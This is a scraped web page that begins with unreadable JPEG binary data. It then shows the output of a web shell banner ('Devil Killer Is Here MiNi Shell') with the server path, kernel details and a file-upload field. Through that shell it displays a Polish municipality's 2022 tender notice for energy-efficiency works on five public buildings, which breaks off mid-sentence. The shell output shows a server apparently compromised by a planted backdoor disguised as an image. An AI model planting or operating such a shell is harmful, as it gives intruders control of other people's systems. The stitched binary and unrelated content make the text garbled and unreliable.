JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220728/0028212701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Poprawa efektywności energetycznej budynków użyteczności publicznej na terenie Gminy Łubnice” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łubnice</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Łubnice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409666</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łubnice 66A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łubnice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-232</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158659236</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">158659236</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@lubnice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lubnice.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Poprawa efektywności energetycznej budynków użyteczności publicznej na terenie Gminy Łubnice” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26e31d51-0e59-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00282127</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024857/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Poprawa efektywności energetycznej budynków użyteczności publicznej na terenie Gminy Łubnice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ , www.bip.lubnice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się droga elektroniczną przy użyciu środków komunikacji elektronicznej miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAP https://epuap.gov.pl/wps/portal.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się droga elektroniczną przy użyciu środków komunikacji elektronicznej miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAP https://epuap.gov.pl/wps/portal.<br/>3.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do Formularza do złożenia, zmiany, wycofania oferty lub wniosku oraz do Formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP<br/>5.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z miniPortalu określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>6.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>7.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu przyjmuje się datę ich przekazania na ePUAP/pocztę elektroniczną.<br/>8.	Zamawiający udostępnia na prowadzonej przez siebie stronie internetowej bip.lubnice.pl link do postępowania oraz ID postępowania. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „DLA WYKONAWCÓW” lub ze strony głównej z zakładki POSTĘPOWANIA.<br/>9.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń (za wyjątkiem oferty oraz załączników do niej składanej za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku) składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania w/w dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: sekretariat@lubnice.eu. Sposób sporządzania dokumentów elektronicznych oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE <br/>(ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: <br/> <br/>1)	administratorem Pani/Pana danych osobowych jest Wójt Gminy Łubnice, Łubnice 66a, 28-232 Łubnice. <br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: rodo@urbanowicz.net.pl<br/>2.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym, o jakim stanowi art. 275 pkt 1 ustawy Pzp oraz w ceku wykonania umowy w kategorii dane zwykłe/dane wrażliwe, o których mowa w art. 9 i/lub art. 10 RODO oraz w celu archiwizacji. <br/> <br/>3.	Do przetwarzania danych osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w art. 10 RODO, dopuszczone są wyłącznie osoby posiadające pisemne upoważnienie administratora danych. Osoby takie są ponadto zobowiązane do zachowania tych danych w poufności. <br/> <br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp. <br/> <br/>5.	W odniesieniu do danych osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w art. 10 RODO, Zamawiający będzie udostępniał te dane jedynie w sytuacji, w której ich ujawnianie jest niezbędne w celu umożliwienia korzystania ze środków ochrony prawnej. Po upływie terminu na skorzystanie ze środków ochrony prawnej albo w przypadku, gdy o dostęp do dokumentów zawierających te dane ubiegają się podmioty, którym nie przysługuje prawo do korzystania ze środków ochrony prawnej, Zamawiający będzie udostępniał dane osobowe zawarte w ww. dokumentach po ich odpowiednim pseudonimowaniu. <br/> <br/>6.	Protokół postępowania wraz z załącznikami jest jawny z wyłączeniem danych, o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia publicznego. <br/> <br/>7.	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, chyba że niezbędny będzie dłuższy okres przetwarzania np. z uwagi na dochodzenie roszczeń lub inny obowiązek wymagany przez przepisy prawa powszechnie obowiązującego. <br/> <br/>8.	Pani /Pana dane osobowe będą przechowywane przez okres niezbędny do zrealizowania celu, dla którego zostały zebrane, a następnie przez okres archiwizacji ustalony w Jednolitym Rzeczowym Wykazie Akt zgodnie z art. 6 ust. 2 ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz.U. z 2020 r. poz. 164). Dla dokumentów wytworzonych w ramach zamówień publicznych krajowych jest to okres 5 lat, dla zamówień publicznych unijnych jest to okres 10 lat. Natomiast umowy cywilno-prawne wraz z dokumentacją dotyczącą ich realizacji, niezależnie od trybu w jakim zostały zawarte, przechowywane są przez okres 10 lat. Okres przechowywania liczony jest od 1 stycznia roku następnego od daty zakończenia sprawy. <br/> <br/>9.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Pozostała treść RODO znajduje się w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IN.271.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Poprawa efektywności energetycznej budynków użyteczności publicznej na terenie Gminy Łubnice” w formule zaprojektuj i wybuduj.<br/>Zamówienie jest współfinansowane w ramach Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych. <br/>Numer Promesy Wstępnej: NR 01/2021/4124/PolskiLad<br/> <br/>2.	Zakres prac obejmuje wykonanie dokumentacji projektowej oraz robót budowlanych w obrębie 5 budynków:	<br/>1)	Publiczna Szkoła Podstawowa im. Wojciecha Skuzy w Łubnicach, Łubnice 62,<br/>28-232 Łubnice. <br/>Przedmiot zamówienia składa się z wykonania kompletnej wielobranżowej dokumentacji projektowej, uzyskania niezbędnych wymaganymi przepisami uzgodnień, pozwoleń, zgłoszeń, itp. oraz wykonanie całości robót budowlanych w oparciu o uprzednio opracowaną dokumentację zaakceptowaną przez Zamawiającego.<br/>Zakres planowanych do realizacji robót budowlanych został zawarty w opracowanym Programie Funkcjonalno- Użytkowym i obejmuje m.in:<br/>- wykonanie docieplenia ścian piwnic i cokołu ponad gruntem styropianem XPS,<br/>- wykonanie docieplenia ściany zewnętrznej dobudowy oraz sali gimnastycznej metodą bezspoinową lekką mokrą wraz z wykonanie elewacji (w systemie ETICS),<br/>- wykonanie docieplenia stropów wełną mineralną,<br/>- wymiana starej stolarki drzwiowej posiadającej niewystarczające parametry cieplne na stolarkę aluminiową,<br/>- modernizację systemu grzewczego wraz z automatyką pogodową kotłowni, (wymiana kotłów wraz z automatyką oraz armaturą kotłowni),<br/>- modernizację systemu przygotowania ciepłej wody użytkowej, montaż pompy ciepła powietrze-woda pracującej w systemie biwalentnym wraz z kotłami na olej opałowy pokrywającej 80% zapotrzebowania na ciepło w sezonach przejściowych przy temp. zewn. 5°C (jesień i wiosna) oraz całkowite zapotrzebowanie na c.w.u, (poza sezonem zimowym), wraz z doprowadzeniem c.w.u do łazienek w części frontowej wraz ze wszystkimi robotami towarzyszącymi,<br/>- wymianę starej stolarki okiennej drewnianej posiadającej niewystarczające parametry cieplne,<br/>na stolarkę pcv,<br/>- wymianę grzejników rurowych na Sali gimnastycznej,<br/>- wykonanie instalacji fotowoltaicznej – 50 kW wraz z przebudową wewnętrznych układów pomiarowych, celem wykonania jednego układu pomiarowego dla całego budynku,<br/>- wymianę oświetlenia wbudowanego na energooszczędne typu LED.<br/>- roboty towarzyszące remontowo-budowlane niezbędne do prawidłowego wykonania całości wyżej opisanych robót<br/><br/>2)	Urząd Gminy Łubnice, Łubnice 66a, 28-232 Łubnice.<br/>Przedmiot zamówienia składa się z wykonania kompletnej wielobranżowej dokumentacji projektowej, uzyskania niezbędnych wymaganymi przepisami uzgodnień, pozwoleń, zgłoszeń, itp. Oraz wykonanie całości robót budowlanych w oparciu o uprzednio opracowaną dokumentację zaakceptowaną przez Zamawiającego.<br/>Zakres planowanych do realizacji robót budowlanych został zawarty w opracowanym Programie Funkcjonalno- Użytkowym i obejmuje m.in:<br/>- wykonanie docieplenia ścian zewnętrznych ponad gruntem metodą bezspoinową lekką mokrą wraz z wykonanie elewacji (w systemie ETICS)<br/>- wykonanie docieplenia stropu nad stropem nad częścią użytkową, oraz skosów poddasza w pomieszczeniach poddasza nieużytkowego<br/>- wymianę starej stolarki drzwiowej PVC od strony frontowej posiadającej niewystarczające<br/>parametry cieplne, na nową stolarkę drzwiową izolowaną wykonaną z profili aluminiowych<br/>oraz wymianę drzwi na elewacji tylnej, stalowych, na nowe drzwi stalowe z wkładką termiczną<br/>- modernizację systemu grzewczego wraz z automatyką pogodową kotłowni, (wymiana kotłów wraz z automatyką oraz armaturą kotłowni, montaż zaworów wraz z głowicami termostatycznymi, zaworów podpionowych, regulacja całego układu)<br/>- modernizację systemu przygotowania ciepłej wody użytkowej, montaż pompy ciepła<br/>powietrze-woda pracującej w systemie hybrydowym (biwalentnym) wraz z kotłami na olej<br/>opałowy, pokrywającej 80% zapotrzebowania na ciepło w sezonach przejściowych przy temp.<br/>zewn. 5°C (jesień i wiosna) oraz całkowite zapotrzebowanie na c.w.u, (poza sezonem zimowym), wraz ze wszystkimi robotami towarzyszącymi,<br/>- wymianę oświetlenia wbudowanego na energooszczędne typu LED (wraz z wbudowanym<br/>oświetleniem awaryjnym i ewakuacyjnym),<br/>- budowę kompletnej elektrowni słonecznej opartej o panele fotowoltaiczne pracującej na potrzeby własne obiektu,<br/>- roboty towarzyszące remontowo-budowlane niezbędne do prawidłowego wykonania całości wyżej opisanych robót.<br/><br/>3)	Dom nauczyciela w Wilkowej, Wilkowa 55, 28-232 Łubnice<br/>Przedmiot zamówienia składa się z wykonania kompletnej wielobranżowej dokumentacji projektowej, uzyskania niezbędnych wymaganymi przepisami uzgodnień, pozwoleń, zgłoszeń, itp. oraz wykonanie całości robót budowlanych w oparciu o uprzednio opracowaną dokumentację zaakceptowaną przez Zamawiającego.<br/>Zakres planowanych do realizacji robót budowlanych został zawarty w opracowanym Programie Funkcjonalno- Użytkowym i obejmuje m.in:<br/>- wykonanie docieplenia ścian piwnic do poziomu gruntu styropianem XPS,<br/>- wykonanie docieplenia ścian zewnętrznych budynku powyżej ścian fundamentowych – metodą bezspoinową lekką mokrą wraz z wykonanie elewacji (w systemie ETICS),<br/>- docieplenie stropu nad ostatnią kondygnacja granulatem wełny mineralnej,<br/>- wymianę stolarki drzwiowej zewnętrznej na stolarkę stalową, wymianę drzwi do piwnic,<br/>- izolację stropu piwnic od spodu styropianem EPS100, zasypanie piwnic, wydzielenie pomieszczenia w miejscu klatki schodowej,<br/>- wymianę stolarki okiennej, zamurowanie luksfery na klatce schodowej,<br/>- roboty towarzyszące remontowo-budowlane niezbędne do prawidłowego wykonania całości wyżej opisanych robót.<br/><br/>4)	Dom nauczyciela w Gacach Słupieckich, Gace Słupieckie 85, 28-232 Łubnice<br/>Przedmiot zamówienia składa się z wykonania kompletnej wielobranżowej dokumentacji projektowej, uzyskania niezbędnych wymaganymi przepisami uzgodnień, pozwoleń, zgłoszeń, itp. oraz wykonanie całości robót budowlanych w oparciu o uprzednio opracowaną dokumentację zaakceptowaną przez Zamawiającego.<br/>Zakres planowanych do realizacji robót budowlanych został zawarty w opracowanym Programie Funkcjonalno- Użytkowym i obejmuje m.in:<br/>- wykonanie docieplenia ścian piwnic w gruncie styropianem XPS wraz z wykonaniem izolacji przeciwwilgociowych,<br/>- wykonanie docieplenia ścian zewnętrznych budynku powyżej ścian fundamentowych - metodą bezspoinową lekką mokrą wraz z wykonanie elewacji (w systemie ETICS),<br/>- docieplenie stropu nad ostatnią kondygnacja granulatem wełny mineralnej.<br/>- wymianę stolarki drzwiowej zewnętrznej na stolarkę stalową, wymianę drzwi do piwnic.<br/>- wymianę stolarki okiennej<br/>- roboty towarzyszące remontowo-budowlane niezbędne do prawidłowego wykonania całości wyżej opisanych robót.<br/><br/>5)	Ośrodek Zdrowia w Gacach Słupieckich, Gace Słupieckie 28, 28-232 Łubnice.<br/>Przedmiot zamówienia składa się z wykonania kompletnej wielobranżowej dokumentacji projektowej, uzyskania niezbędnych wymaganymi przepisami uzgodnień, pozwoleń, zgłoszeń, itp. oraz wykonanie całości robót budowlanych w oparciu o uprzednio opracowaną dokumentację zaakceptowaną przez Zamawiającego.<br/>Zakres planowanych do realizacji robót budowlanych został zawarty w opracowanym Programie Funkcjonalno- Użytkowym i obejmuje m.in:<br/>- wykonanie izolacji przeciwwilgociowej pionowej ścian fundamentowych posadowionych poniżej poziomu gruntu, oraz wykonanie drenażu opaskowego dookoła budynku<br/>- wykonanie docieplenia ścian fundamentowych posadowionych poniżej poziomu gruntu styrodurem XPS,<br/>- wykonanie docieplenia ścian zewnętrznych ponad gruntem metodą bez spoinową lekką mokrą wraz z wykonanie elewacji (w systemie ETICS)<br/>- wykonanie docieplenia stropu nad ostatnią kondygnacją wełną mineralną<br/>- wymianę starej stolarki drzwiowej PVC posiadającej niewystarczające parametry cieplne, na nową stolarkę drzwiową izolowaną wykonaną z profili aluminiowych<br/>- roboty towarzyszące remontowo-budowlane niezbędne do prawidłowego wykonania całości wyżej opisanych robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria:<br/>A. Cena<br/>Oferty nieodrzucone oceniane będą według wzoru:<br/>LP=najniższa cena brutto (zł) spośród ofert nie podlegających odrzuceniu/cena brutto badanej oferty (zł) x 60% x100<br/><br/>B. Okres gwarancji na przedmiot umowy:<br/>Wykonawca zobowiązany jest podać w ofercie okres gwarancji jaki udzieli na wykonany przedmiot umowy w miesiącach. Minimalny okres gwarancji wynosi 24 miesiące od dnia podpisania protokołu odbioru końcowego, za którą Wykonawca nie otrzyma żadnych punktów. Maksymalny okres gwarancji – 60 miesięcy od dnia podpisania protokołu odbioru końcowego przedmiotu umowy. Termin obowiązywania gwarancji rozpoczyna bieg dla dokumentacji projektowej - od dnia dokonania jej odbioru, a dla robót budowlanych - od dnia końcowego odbioru robót budowlanych. <br/> <br/>Zaproponowanie okresu 